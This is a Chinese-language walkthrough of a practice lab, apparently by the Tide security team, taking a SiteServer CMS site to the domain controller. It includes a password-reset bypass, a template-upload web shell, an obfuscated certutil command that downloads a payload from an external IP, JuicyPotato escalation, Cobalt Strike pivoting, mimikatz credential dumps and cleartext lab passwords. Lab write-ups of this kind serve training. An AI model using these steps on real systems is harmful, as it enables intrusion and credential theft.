从web端getshell到内网域控
先说结论
这套环境刚开始大体看了下以为比较有难度,没想到拿下域内OA办公机时直接把域管密码dump下来了,感觉属实草率了。。。不过整体来说还是可以的,对于在实战中遇到域控不多的铁子可以拿来练练手熟悉环境,最后感谢作者提供的靶场环境,大佬辛苦了!
信息收集
已知靶标URL为http://www.moonlab.com/
(搭建环境访问时需要绑定hosts),直接访问域名没啥东西
查看robots.txt
siteserver管理员密码找回
siteserver之前爆出过管理员密码找回功能存在缺陷,详情见此
使用密码找回功能
http://www.moonlab.com/siteserver/forgetPassword.aspx
火狐禁用JS,Firefox地址栏
about:config
搜索框中输入JavaScript,找到javascript.enabled将其转换为false
回到找回密码页面,一直点下一步
后台getshell
siteserver后台getshell方法很多,详情
这里使用模板文件上传拿shell。
在’系统管理’–’站点模版管理’–’导入站点模版’,
使用csroad大佬的webshell免杀生成器生成ashx CMD马,压缩为rar上传到目标模版里,然后访问即可获取webshell
tasklist可以看到有安全狗
上线cs,本机信息收集,搭代理
使用免杀语句将cs木马下载到靶机
c""""e""""r""""t""""u""""t""""i""""l.exe -urlcache -split -f http://23.234.209.205:8000/6666.exe 6666.exe
查看权限,梼杌插件JuicyPotato (ms16-075)提权至system
查看是否开启3389
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
shell tasklist /svc | findstr "TermService"
shell netstat -ano | findstr "992"
双网卡机器
读管理员密码 administrator !@#QWE123
上frp搭代理(已经读出管理员密码,确认开启3389,故忽略此步骤接下来直接在虚拟机内靶机上操作,否则太卡。。。)
shellfrpc.exe-csocks5.ini
内网横向
fscan探测内网信息,发现1.130机器存在通达OA
直接梭哈拿shell
system权限带360、不出网,双网卡存在10.10.10.段,2012操作系统
正向连接上线CS,首先生成监听器beacon-tcp,监听在17775端口
然后CS生成一个stageless木马,选定刚才的新监听器
connect 10.10.1.130 17775
可以看到是域内机器,而且有域控进程
mimikatzs抓取logonpasswords
获取本机administrator密码!@#Q123,域内用户OA密码!@#Qz123,域控administrator密码tide123…
域控
定位域控IP10.10.10.165
nmap扫全端口,3389已开
直接远程桌面登录
flag.txt
E
N
D
关
于
我
们
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。
团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室,近三年来在网络安全技术方面开展研发项目60余项,获得各类自主知识产权30余项,省市级科技项目立项20余项,研究成果应用于产品核心技术研究、国家重点科技项目攻关、专业安全服务等。对安全感兴趣的小伙伴可以加入或关注我们。
最新评论
推荐文章
作者最新文章
你可能感兴趣的文章
Copyright Disclaimer: The copyright of contents (including texts, images, videos and audios) posted above belong to the User who shared or the third-party website which the User shared from. If you found your copyright have been infringed, please send a DMCA takedown notice to [email protected]. For more detail of the source, please click on the button "Read Original Post" below. For other communications, please send to [email protected].
版权声明:以上内容为用户推荐收藏至CareerEngine平台,其内容(含文字、图片、视频、音频等)及知识版权均属用户或用户转发自的第三方网站,如涉嫌侵权,请通知[email protected]进行信息删除。如需查看信息来源,请点击“查看原文”。如需洽谈其它事宜,请联系[email protected]。
版权声明:以上内容为用户推荐收藏至CareerEngine平台,其内容(含文字、图片、视频、音频等)及知识版权均属用户或用户转发自的第三方网站,如涉嫌侵权,请通知[email protected]进行信息删除。如需查看信息来源,请点击“查看原文”。如需洽谈其它事宜,请联系[email protected]。